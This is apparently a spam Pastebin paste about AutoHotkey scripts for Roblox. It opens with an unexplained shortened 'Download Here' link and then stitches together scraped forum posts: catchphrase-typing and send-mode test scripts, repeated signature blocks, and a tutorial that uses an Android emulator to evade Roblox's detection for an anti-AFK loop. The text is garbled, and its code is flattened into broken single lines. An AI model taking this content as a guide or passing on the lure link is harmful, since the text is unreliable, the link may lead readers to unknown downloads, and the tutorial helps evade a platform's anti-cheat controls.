Advertisement
Guest User

Autohotkey roblox

a guest
Nov 9th, 2024
132
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.62 KB | None | 0 0
  1. -
  2. Download Here --> https://tinyurl.com/ytwvd2es (Copy and Paste Link)
  3.  
  4.  
  5.  
  6.  
  7.  
  8.  
  9. Getting AHK working for ROBLOX
  10. If you don't have ROBLOX, i'm not pushing you to download it for the sake of a catchphrase, unless you want to.
  11. I'm trying to get this line working in-game. I've seen it done in-game and I've gotten it working before just yesterday, Although yesterday I accidentally undid what I have changed in this script that made it work. This is how it looked before my change (minus the note):
  12. If you already have roblox and mess with this and manage to get it to only put in the period from'/Catchphrases are cool.' into roblox, tell me.
  13. The script was copied from a spam bot example, but is not intended for spam, hence the '/Catchphrases are cool.' hints what I'm using this for.
  14.  
  15. Members
  16. 845 posts
  17.  
  18. Last active: Jan 24 2016 05:24 PM
  19. Joined: 08 Oct 2012
  20.  
  21. IF NOT A_IsAdmin #SingleInstance, force SetWorkingDir, %A_ScriptDir% ^Q:: Catchphrase_function("NO broken harmony") Catchphrase_function("She had rainbow eyes") Catchphrase_function("OHhhhhHHhhhhHH") Catchphrase_function("MMMmmmmmm") return Catchphrase_function(tex) return F5:: reload return
  22.  
  23. Download link of my scripts on Autohotkey.com 2/10/2015 [DOWNLAND]
  24. Contact Info: https://github.com/floowsnaake // FloowSnaake(A)gmail.com
  25. IF you need Help send me a PM,Email or Post on Github
  26.  
  27. Quote by tank Posted 29 September 2015 - 06:14 PM
  28.  
  29. "Eventually i will find a way to convert the DB back to PHPBB3. but i dont have the bandwidth right now. No one that has tried has had success. It is the Only way i can keep this open is if i could successfully convert it."
  30.  
  31. That works everywhere else but not in-game
  32.  
  33. Members
  34. 845 posts
  35.  
  36. Last active: Jan 24 2016 05:24 PM
  37. Joined: 08 Oct 2012
  38.  
  39. Then try different send styles:
  40. IF NOT A_IsAdmin #SingleInstance, force SetWorkingDir, %A_ScriptDir% ^Q:: Kex = test_ WaitTime = 500 ToolTip, Testing %Kex%1 With Send,0,0 Send, %Kex%1 sleep, %WaitTime% ToolTip, Testing %Kex%2 With SendRaw,0,0 sleep, %WaitTime% SendRaw, %Kex%2 ToolTip, Testing %Kex%3 With SendInput,0,0 sleep, %WaitTime% SendInput, %Kex%3 ToolTip, Testing %Kex%4 With SendPlay,0,0 sleep, %WaitTime% SendPlay, %Kex%4 ToolTip, Testing %Kex%5 With SendEvent,0,0 sleep, %WaitTime% SendEvent, %Kex%5
  41.  
  42. Download link of my scripts on Autohotkey.com 2/10/2015 [DOWNLAND]
  43. Contact Info: https://github.com/floowsnaake // FloowSnaake(A)gmail.com
  44. IF you need Help send me a PM,Email or Post on Github
  45.  
  46. Quote by tank Posted 29 September 2015 - 06:14 PM
  47.  
  48. "Eventually i will find a way to convert the DB back to PHPBB3. but i dont have the bandwidth right now. No one that has tried has had success. It is the Only way i can keep this open is if i could successfully convert it."
  49.  
  50. [Tutorial] How to use AutoHotkey in Roblox (How to Anti AFK in Roblox)
  51. I saw a lot of people in this sub being helpless about how to use AHK for Roblox.
  52. Roblox by itself blocks the ControlSend command so what I tried at first was to use Sandboxie which they blocked and kicked me out of the game (unexpected client behavior). What you need to do is download an Android emulator (I'm using LDPlayer). The code will work there because they can't detect it since it's another system.
  53. Here is the code for Anti AFK using LDPlayer (it just holds d for some time, you can change it to your liking). Sorry if the code is bad or something is unnecessary, I only started learning it few hours ago.
  54. #Persistent SetKeyDelay, 0 DetectHiddenWindows, On SetTitleMatchMode, 2
  55. Loop ControlSend, RenderWindow1, , LDPlayer sleep 100 ControlSend, RenderWindow1, , LDPlayer sleep 10000 > return
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement